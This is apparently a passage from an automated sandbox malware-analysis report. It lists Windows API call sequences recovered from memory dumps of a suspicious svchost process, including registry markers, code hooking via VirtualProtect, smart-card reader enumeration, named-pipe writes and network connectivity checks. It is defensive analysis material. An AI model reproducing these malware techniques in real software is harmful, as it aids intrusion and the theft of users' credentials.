                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                    • String ID: 80f502cfa$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2113243795-956736100
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C831D4
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,76230F10,00000000), ref: 02C831F7
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,76230F10,00000000), ref: 02C8321A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000015,?,76230F10,00000000), ref: 02C8328D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,76230F10,00000000), ref: 02C83294
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C832A4
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000002,?,76230F10,00000000), ref: 02C832D2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                    • String ID: software\microsoft
                                                                                                                                                                                                                    • API String ID: 4043890984-3673152959
                                                                                                                                                                                                                    • Opcode ID: 938e5983cb5dc41a3770d10e2b755d0cd0f9b5e85c28e557abdbd5e662052f64
                                                                                                                                                                                                                    • Instruction ID: da9891e3be98d4c1a52e2c2ed95cd7b6662a5d391b76b87e312ac4960b0d8925
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 938e5983cb5dc41a3770d10e2b755d0cd0f9b5e85c28e557abdbd5e662052f64
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F31C832E042DDABCB22DB649C08BDB7BB8AFC5B08F0586D4ED5497101D770DB498B91
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02C8924B
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02C89298
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02C892C7
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000), ref: 02C892CE
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02C892E2
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 02C892F9
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C89301
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 842647815-3387790918
                                                                                                                                                                                                                    • Opcode ID: 61f986011ddaad9f9f5d0b6dbd3188fa6f5d00b2d0960e879eb0c59615c09e50
                                                                                                                                                                                                                    • Instruction ID: 776aa29ac6adfd7372a221d914691c6ac6f9cd4e1b74a4149aa9d8fb52a3ef11
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61f986011ddaad9f9f5d0b6dbd3188fa6f5d00b2d0960e879eb0c59615c09e50
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A215A75A40201EFD725DF55D888F66B7A9FB88714F04CA48E60697790CB30F954CB91
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C88BF7
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C88C09
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C23
                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(?,80f5035da,00000000,00000004,?,00000004,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C40
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C4A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C54
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                    • String ID: 80f5035da$software\microsoft
                                                                                                                                                                                                                    • API String ID: 287100044-1475967691
                                                                                                                                                                                                                    • Opcode ID: af3d3c3d917ee86980ea8899395568b370373d70d68ad8fb6a81ea8d3a2bf517
                                                                                                                                                                                                                    • Instruction ID: b19634f42ef7c3292fa34f6bbd09172dabb954f0f2e18e5e67ba2428723a9bd0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af3d3c3d917ee86980ea8899395568b370373d70d68ad8fb6a81ea8d3a2bf517
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAF03175D80258FBD701DBA0AD49F9A7B3CAF04701F104795FA06A3180D6709A1587A4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C93F13
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C93F76
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                                    • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$7F1BFC6B$80F503C1a
                                                                                                                                                                                                                    • API String ID: 2823094833-2369066373
                                                                                                                                                                                                                    • Opcode ID: 56d286c8fbf1fcafa5865725b26843ec90a64cb741d60294705bbd3a10ff8e41
                                                                                                                                                                                                                    • Instruction ID: e0cbaeed9ecfb537269936f1a9088f204baa542f2f80854772de925ea2260573
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56d286c8fbf1fcafa5865725b26843ec90a64cb741d60294705bbd3a10ff8e41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE4125B2E00199ABDB15CB688D88BEEF7FEEF94300F1502E4E545AB280D7716B458780
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C848D8
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,80f50428a,00000000,00000000,00000000,?), ref: 02C8491A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 02C84924
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(-80000001), ref: 02C848EA
                                                                                                                                                                                                                      • Part of subcall function 02C73430: IsUserAnAdmin.SHELL32 ref: 02C73438
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegQueryValueExA.ADVAPI32(?,80f502cfa,00000000,?,00000000,?), ref: 02C7348C
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C73496
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegQueryValueExA.KERNEL32(?,80f502cfa,00000000,?,00000000,?), ref: 02C734E6
                                                                                                                                                                                                                      • Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C734F0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                    • String ID: 80F50B91a$80f50428a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2113243795-3917903170
                                                                                                                                                                                                                    • Opcode ID: 66b96ee46b1c71e43464b0cad1529f1feb87841dee9d931c06d73110e0bc9115
                                                                                                                                                                                                                    • Instruction ID: 3be5ce622da499e016b5904651f4a545f69ed32f49199a27d74f66c8fb0bfc8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66b96ee46b1c71e43464b0cad1529f1feb87841dee9d931c06d73110e0bc9115
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA0152B5E90249ABDB14DBB4DC45FAE77BCEF44714F104B98F515E7180E77496008B90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C890FA
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89106
                                                                                                                                                                                                                      • Part of subcall function 02C89130: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
                                                                                                                                                                                                                      • Part of subcall function 02C89130: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
                                                                                                                                                                                                                      • Part of subcall function 02C89130: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
                                                                                                                                                                                                                      • Part of subcall function 02C89130: memset.MSVCRT ref: 02C8915E
                                                                                                                                                                                                                      • Part of subcall function 02C89130: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89117
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8911E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2609073853-0
                                                                                                                                                                                                                    • Opcode ID: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
                                                                                                                                                                                                                    • Instruction ID: 7690c3e9f1e6a4d59b50bc6c9277e97bcbfb76cd1f993ad7a093bdfbb91cb0f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22410072A40216B7CB10AE788C88FBB777AEF94258F448619F94597384DB35E901C7E0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040231D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                    • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                    • API String ID: 3225117150-898603304
                                                                                                                                                                                                                    • Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                                    • Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02C73A91,?), ref: 02C737E0
                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,80f50271a,00000000,00000004,?,00000004,?,?,02C73A91,?), ref: 02C737FC
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C7380A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C73818
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                    • String ID: 80f50271a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2510291871-3506209191
                                                                                                                                                                                                                    • Opcode ID: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
                                                                                                                                                                                                                    • Instruction ID: 4ccb169730d5804e2a1c6b65925daf7e587f849852541bb732c89dd95e9780d8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3F030B5E80248FBE711CA91DD49FAA776CDF04B44F108699FA01E7140D770EA10A7A5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02C856A3,00000000), ref: 02C93D45
                                                                                                                                                                                                                    • SCardListReadersA.WINSCARD(02C856A3,00000000,?,FFFFFFFF), ref: 02C93D5C
                                                                                                                                                                                                                    • SCardConnectA.WINSCARD(02C856A3,?,00000002,00000003,?,?), ref: 02C93D8E
                                                                                                                                                                                                                    • SCardFreeMemory.WINSCARD(02C856A3,?), ref: 02C93DC9
                                                                                                                                                                                                                    • SCardReleaseContext.WINSCARD(?), ref: 02C93DDD
                                                                                                                                                                                                                    • SCardReleaseContext.WINSCARD(02C856A3), ref: 02C93DE7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Card$Context$Release$ConnectEstablishFreeListMemoryReaders
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4220388116-0
                                                                                                                                                                                                                    • Opcode ID: 573c72c4a9e818c6aef5024e680623d5f20106d5fc941ccebf31bba1b295727c
                                                                                                                                                                                                                    • Instruction ID: c89187b9411d758a93a7aa6bb40e3e85a88ed30e947d8ebbc6ad705c09c80665
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 573c72c4a9e818c6aef5024e680623d5f20106d5fc941ccebf31bba1b295727c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12310F76E10259ABDF21CF99C858BEEB7BDEF84604F144689E915E7240D770AB04CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000101,?,02C73A83), ref: 02C73784
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,80f50271a,00000000,?,00000000,?), ref: 02C737A5
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 02C737B3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                    • String ID: 80f50271a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 3677997916-3506209191
                                                                                                                                                                                                                    • Opcode ID: 438c0b29fcafb0ee7a2b4f30c94ef07994edde75fffedb93b7823bde09dc40ab
                                                                                                                                                                                                                    • Instruction ID: 39ce229bfdeca4e4d3475bb05b3248a25564608a45d619c53a4a46de025325d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 438c0b29fcafb0ee7a2b4f30c94ef07994edde75fffedb93b7823bde09dc40ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF03CB4E40248FBEB00CF94DD45FEEBBBCEB08704F104699EA05E7280D7B5A6048B94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C763D0
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
  • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
  • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
  • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
• Sleep.KERNEL32(000001F4,?,76230F10,00000000), ref: 02C763EC
• CreateThread.KERNEL32(00000000,00000000,02C76060,00000000,00000000,00000000), ref: 02C76448
• WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,00000000,?,76230F10,00000000), ref: 02C76470
• CloseHandle.KERNEL32(?,?,76230F10,00000000), ref: 02C76488
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
APIs
• PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
• FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
• FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
• Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
APIs
• CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,762330D0,76233240,?,02C86C2C,?,00000000,?,?), ref: 02C764FD
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76518
• SetEndOfFile.KERNEL32(00000000,?,02C86C2C,?,00000000,?,?,00000000), ref: 02C76523
• GetHandleInformation.KERNEL32(00000000,00000000,?,02C86C2C,?,00000000), ref: 02C76542
• CloseHandle.KERNEL32(00000000,?,02C86C2C,?,00000000), ref: 02C76553
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
APIs
• PathFindFileNameA.SHLWAPI(?), ref: 02C86BAA
• FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02C86BE8
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02C86C03
• FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02C86C0A
• Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02C86C31
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
APIs
• IsUserAnAdmin.SHELL32 ref: 02C76084
  • Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F72
  • Part of subcall function 02C75F50: memset.MSVCRT ref: 02C75F90
  • Part of subcall function 02C75F50: lstrcpynA.KERNEL32(?,?,00000104), ref: 02C75FAD
  • Part of subcall function 02C75F50: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C7601D
  • Part of subcall function 02C75F50: RegSetValueExA.ADVAPI32(?,80F50759a,00000000,00000001,?,00000104), ref: 02C7603F
  • Part of subcall function 02C75F50: RegCloseKey.ADVAPI32(?), ref: 02C7604D
• GetProcessHeap.KERNEL32(00000000,?), ref: 02C760B4
• HeapValidate.KERNEL32(00000000), ref: 02C760B7
• GetProcessHeap.KERNEL32(00000000,?), ref: 02C760C4
• RtlFreeHeap.NTDLL(00000000), ref: 02C760C7
  • Part of subcall function 02C75C80: memset.MSVCRT ref: 02C75CA0
  • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CE7
  • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75CF6
  • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75CFF
  • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D09
  • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D27
  • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D33
  • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D3C
  • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D46
  • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D64
  • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D71
  • Part of subcall function 02C75C80: calloc.MSVCRT ref: 02C75D7B
  • Part of subcall function 02C75C80: exit.MSVCRT ref: 02C75D86
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
